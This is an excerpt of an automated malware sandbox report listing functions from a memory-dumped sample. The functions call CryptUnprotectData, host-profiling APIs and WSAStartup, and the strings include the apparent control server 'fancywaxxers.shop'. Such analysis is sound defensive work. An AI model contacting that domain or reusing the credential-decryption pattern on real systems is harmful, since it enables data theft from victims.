• Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                        • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                        • API String ID: 1773362589-4038474941
                                                                                        • Opcode ID: 1dcae15d8386774f9524710f8d650d52f688fa2c75ea64426fea0246fa5ce20a
                                                                                        • Instruction ID: bd12cefd6a2131e80ba683404985ce6726fc96fcd4d4e5a99b7283733e4f17a5
                                                                                        • Opcode Fuzzy Hash: 1dcae15d8386774f9524710f8d650d52f688fa2c75ea64426fea0246fa5ce20a
                                                                                        • Instruction Fuzzy Hash: C02213B66083419BD310CF29C885B6BBBE1EFC9314F14892DE598DB291DB79D805CB83

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 007ED910: LdrInitializeThunk.NTDLL(007F09B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007ED93E
                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007C97EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptDataInitializeThunkUnprotect
                                                                                        • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                        • API String ID: 279577407-4262920783
                                                                                        • Opcode ID: 9ca7f7717e99ff0cbd7ea445290fc24ebec8e684a3c59db76597fe5861949e66
                                                                                        • Instruction ID: fc31066db8688b920b02afa104e7dd3c0b613ae39d44ce9c788ad93bd85efcb2
                                                                                        • Opcode Fuzzy Hash: 9ca7f7717e99ff0cbd7ea445290fc24ebec8e684a3c59db76597fe5861949e66
                                                                                        • Instruction Fuzzy Hash: 37C1FC726083818FD768DF28C895BAFB7E2AFD5300F19893CD5D987291DB389905CB42

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeapInitializeThunk
                                                                                        • String ID: !@$,$0$1$=$?$@$B$T$V$W
                                                                                        • API String ID: 383220839-2565976686
                                                                                        • Opcode ID: 6b0ea20b6c491ae6ce657fffbd63b187480285b00b62916bf20b1ee99f4fd925
                                                                                        • Instruction ID: 809314d4aede22ebd99129ffd7e0417321973d5a2517b016905b3a8c24f4e91a
                                                                                        • Opcode Fuzzy Hash: 6b0ea20b6c491ae6ce657fffbd63b187480285b00b62916bf20b1ee99f4fd925
                                                                                        • Instruction Fuzzy Hash: 7432CE7160C7809FD324CB28C4803AFBBE2ABD5324F59892EE5D587392D6BD9845CB43

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: .a]b$GK8m$LM$T_RE$fancywaxxers.shop$iped$wtf|
                                                                                        • API String ID: 3861434553-2559626107
                                                                                        • Opcode ID: 761d6453ad3705455d531607fcadc25fe800ba8dd564415d68bf3ab52d04712f
                                                                                        • Instruction ID: 2ce0dca22581d620a387b593b156a43844f75372e320a15ce70e2040406daf63
                                                                                        • Opcode Fuzzy Hash: 761d6453ad3705455d531607fcadc25fe800ba8dd564415d68bf3ab52d04712f
                                                                                        • Instruction Fuzzy Hash: 3EB111756493C18BD335CF29C8903EFBBE1ABD7310F18896DD4D94B342C67989068B92

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "0}$7x~$`*}
                                                                                        • API String ID: 0-4246718527
                                                                                        • Opcode ID: 23f8e4a537c1865d4b86cff61a3dee3897d27f572cdf9b182ab1da33b40fc564
                                                                                        • Instruction ID: b0acf392ecce038216823853203a2a760e3cb651ae1ad2453f4a78391ff77285
                                                                                        • Opcode Fuzzy Hash: 23f8e4a537c1865d4b86cff61a3dee3897d27f572cdf9b182ab1da33b40fc564
                                                                                        • Instruction Fuzzy Hash: 6A7235B2A18201CFD718CF68DC817AEB7B2FF84310F09856CE9459B395E7389911CB91

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E8C58279CAE175520A4C476FD51BCB1$96$ec$fg$m$t{$T
                                                                                        • API String ID: 0-930948990

                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128

                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128

                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: =:;8$
                                                                                        • API String ID: 2994545307-3594289699
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Zysf${ts|
                                                                                        • API String ID: 2994545307-929106683
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E8C58279CAE175520A4C476FD51BCB1$]b
                                                                                        • API String ID: 0-2759662118
                                                                                        • Opcode ID: 6d85c81f6397d77a2e110971b25678f75bd5803d8e56d4aa6340c57ca0974431
                                                                                        • Instruction ID: a36e9cc274df799937c202541e240389274e469f1a95cf11049c9f99602a07eb
                                                                                        • Opcode Fuzzy Hash: 6d85c81f6397d77a2e110971b25678f75bd5803d8e56d4aa6340c57ca0974431
                                                                                        • Instruction Fuzzy Hash: 11617A76E153908BD320CB25CC517EFBBD2ABD5311F19C92CD8C9E7245DB3859018782
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: uJ[L$yJ[L
                                                                                        • API String ID: 0-3296124075
                                                                                        • Opcode ID: a4a86d7b52cb3e14db97b2db7578f3efe0a8f0f8a5aefe0835618a64f114a3ca
                                                                                        • Instruction ID: f53fb591ea3304d65121c93595bf8a8239585c7db0c88596875c0d5a66c4cfbc
                                                                                        • Opcode Fuzzy Hash: a4a86d7b52cb3e14db97b2db7578f3efe0a8f0f8a5aefe0835618a64f114a3ca
                                                                                        • Instruction Fuzzy Hash: D83105B2A405019FD71DCF28CC627BE7BE2FB99310F69806DD252E7790DB38A9018704
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(00000000), ref: 007B88E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: caefa875ca992832038e93bfe6407e32c4b141810255651ece52676ca7e1bb1d
                                                                                        • Instruction ID: cc76ee64793fa18f75cc5071508ecacda813e63abb0c7e4844629a6c1c041461
                                                                                        • Opcode Fuzzy Hash: caefa875ca992832038e93bfe6407e32c4b141810255651ece52676ca7e1bb1d
                                                                                        • Instruction Fuzzy Hash: C8613977B543094BD718AEACCC8639AB7C69B84310F1E853CA598DB392ED7C9C04D786
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(007F09B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007ED93E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: yPC
                                                                                        • API String ID: 2994545307-621879255
                                                                                        • Opcode ID: 73404d408cfb2530c69f5fd7543a48a76e30338933f959677422eabbc76795cf
                                                                                        • Instruction ID: 9b70f5faec3cef39a2304a66eed0210d853b621c7763104f374c174eceaa0d0d
                                                                                        • Opcode Fuzzy Hash: 73404d408cfb2530c69f5fd7543a48a76e30338933f959677422eabbc76795cf
                                                                                        • Instruction Fuzzy Hash: C9617672A092549BD7249A26DC8177BBBA3EBC8310F2E843CD9855B346E6399C0187C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D]+\
                                                                                        • API String ID: 0-1174097187
                                                                                        • Opcode ID: cb1f40420c4832113f96a79a381cc981f6b709cf62ee3c904e0d25967a432112
                                                                                        • Instruction ID: 78cd87ca383f9d71a6125ae1c8c86148aa8c1f1ed2a447a3b2641d738238c677
                                                                                        • Opcode Fuzzy Hash: cb1f40420c4832113f96a79a381cc981f6b709cf62ee3c904e0d25967a432112
                                                                                        • Instruction Fuzzy Hash: 9A316BB47496908BE3188E92DCD073A739AF7DE300F28983DC5851B286C23C9C41C79B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc759e0255c5dffba4064865cc7b431a7c7f1d29af8a6f79436f3393c9c42ff1
                                                                                        • Instruction ID: 523d65d93bfcbad899911a2bd1b2ee2dc01c51346a147cea74500dd2884d66db
                                                                                        • Opcode Fuzzy Hash: dc759e0255c5dffba4064865cc7b431a7c7f1d29af8a6f79436f3393c9c42ff1
                                                                                        • Instruction Fuzzy Hash: 2AA1257210E3C48FD3448A2AC85436FBBD29BD9318F298A2DE4D957382DABDC945D707
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 528 7db842-7db84c 529 7db84e-7db855 528->529 530 7db86b-7db8b6 FreeLibrary call 7ef450 528->530 531 7db860-7db869 529->531 536 7db8c0-7db8e5 530->536 531->530 531->531 536->536 537 7db8e7-7db8f1 536->537 538 7db90b-7db942 GetComputerNameExA 537->538 539 7db8f3-7db8fa 537->539 541 7db946 538->541 540 7db900-7db909 539->540 540->538 540->540 541->541
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 007DB875
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 2904949787-1032087821

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 542 7db840-7db8b6 FreeLibrary call 7ef450 547 7db8c0-7db8e5 542->547 547->547 548 7db8e7-7db8f1 547->548 549 7db90b-7db942 GetComputerNameExA 548->549 550 7db8f3-7db8fa 548->550 552 7db946 549->552 551 7db900-7db909 550->551 551->549 551->551 552->552
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 007DB875
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 2904949787-1032087821

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 717 7db94d-7db957 718 7db959 717->718 719 7db96b-7db9a6 717->719 720 7db960-7db969 718->720 722 7db9b0-7db9fb 719->722 720->719 720->720 722->722 723 7db9fd-7dba07 722->723 724 7dba2d-7dba34 723->724 725 7dba09-7dba1f 723->725 727 7dba3b-7dba71 GetComputerNameExA 724->727 726 7dba20-7dba29 725->726 726->726 728 7dba2b 726->728 728->727
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 007DBA54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: bC
                                                                                        • API String ID: 3545744682-4190571504
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 007DBA54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: bC
                                                                                        • API String ID: 3545744682-4190571504
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 3545744682-1032087821
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 007B9E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d641a48738ea5f9fce196d381e75465df60307771e6af7fbf1b759e02fe4765e
                                                                                        • Instruction ID: b4e5c5234b2af48b8b0d7fc5d8b9188c42a305d32a2d92ac6ceb423b25fc656f
                                                                                        • Opcode Fuzzy Hash: d641a48738ea5f9fce196d381e75465df60307771e6af7fbf1b759e02fe4765e
                                                                                        • Instruction Fuzzy Hash: C3110475B442908FC7188F25D8816B9BFE1FB95321B19C4ACD591DB362C23CE846CBA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ff70e3b84d3dca673cc71a16646be916a2c98b6d2df5e6de1c40a157eee9732
                                                                                        • Instruction ID: 35694d1386ba823b5544b47434600ee278dd0d0b85ea4c5a7b2bace31ec125b6
                                                                                        • Opcode Fuzzy Hash: 8ff70e3b84d3dca673cc71a16646be916a2c98b6d2df5e6de1c40a157eee9732
                                                                                        • Instruction Fuzzy Hash: 26F0CD71119342EFD7202F26AC49B273778EF9A301F040C35F50191061EB39AC148671
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: c18c25586cbee6cc9b185ceb4737c33c776552acde4cc97694ad2afb9deec8c4
                                                                                        • Instruction ID: d159c66201671fb31c49478ee836d67c32f6c82303a0bc184159606f24dc6b78
                                                                                        • Opcode Fuzzy Hash: c18c25586cbee6cc9b185ceb4737c33c776552acde4cc97694ad2afb9deec8c4
                                                                                        • Instruction Fuzzy Hash: 4DF0E275609702CFE301CF25C55871BBBF6BB88314F25891CE0A48B751C7B9AA898FC2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: 5515f8a8c00ba933f26f2783f82899bd470a657962077b9931c1aa5bd2b9b1b6
                                                                                        • Instruction ID: 03636a464839313249cec68935d5b6c086b07fe5f3fef1a2303abca4c2147484
                                                                                        • Opcode Fuzzy Hash: 5515f8a8c00ba933f26f2783f82899bd470a657962077b9931c1aa5bd2b9b1b6
                                                                                        • Instruction Fuzzy Hash: 09F0D4B06093028FE354DF68D5A871BBBE0EB88304F10881DE4958B390C7B99608CF82
                                                                                        APIs
                                                                                        • WSAStartup.WS2_32(00000202), ref: 007B9CC6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Startup
                                                                                        • String ID:
                                                                                        • API String ID: 724789610-0
                                                                                        • Opcode ID: ddf6c17ade320005db91740fc1620be9af448aee267537b8d6069078d8a0beeb
                                                                                        • Instruction ID: 28b784cf90c89b1064ab75ecf0dbdfe9c54db67ac50d7b02184e7d611d3271a9
                                                                                        • Opcode Fuzzy Hash: ddf6c17ade320005db91740fc1620be9af448aee267537b8d6069078d8a0beeb
                                                                                        • Instruction Fuzzy Hash: 89C08C602D06609AF22C8329CC0ED3BBB6FAFC7F4DB00C00FD211063EBC5A00005CAA8
                                                                                        APIs
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 007BC674
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 0781d70bf2caf6d6c38d8ad58bc7f9f1094978369e70d557bda47ab4f0d976bb
                                                                                        • Instruction ID: 44ef0a9262d72e9f7438b2736712f58c08f0c1a76f076433d99a39fac77fd8db
                                                                                        • Opcode Fuzzy Hash: 0781d70bf2caf6d6c38d8ad58bc7f9f1094978369e70d557bda47ab4f0d976bb
                                                                                        • Instruction Fuzzy Hash: 87E0C222B91A4467D204AA18CC47F5A361A8382325F4CC3256650CA3C4E968A911C05E
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 007BC6B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: 08770e5676961f5b2330716033ed7ea34e232506e6a1e248c70f51da731806ac
                                                                                        • Instruction ID: 3f7ffb9f68498d1cd6b6e830445aabde177df033121d7dad4f14bbc7033e6a78
                                                                                        • Opcode Fuzzy Hash: 08770e5676961f5b2330716033ed7ea34e232506e6a1e248c70f51da731806ac
                                                                                        • Instruction Fuzzy Hash: CAE05276BE530027F6384A18EC23F5423025395B21F38C218B310EE3C8C8ECA402820C
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000,007ED8F6,?,?,?,00000000,007BB40D,00000000,00000000), ref: 007EBCCE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: f65304396adbc8ef661f14bc47c7f92cc5678abbedcd21cab855217f9997e5a2
                                                                                        • Instruction ID: 282d21947fe9bf9541d5550526a539dd4fe23b4e9fa9838cc23b6b6efe476d11
                                                                                        • Opcode Fuzzy Hash: f65304396adbc8ef661f14bc47c7f92cc5678abbedcd21cab855217f9997e5a2
                                                                                        • Instruction Fuzzy Hash: D6D01231405122EFC7101F14FC0AB963B55EF59320F074861F400AB171C669EC50DAD4
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,007ED8EB), ref: 007EBCA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 48ad45757fe133e13a79d95bf73dacf7304bc981996519f97dcff679c8444193
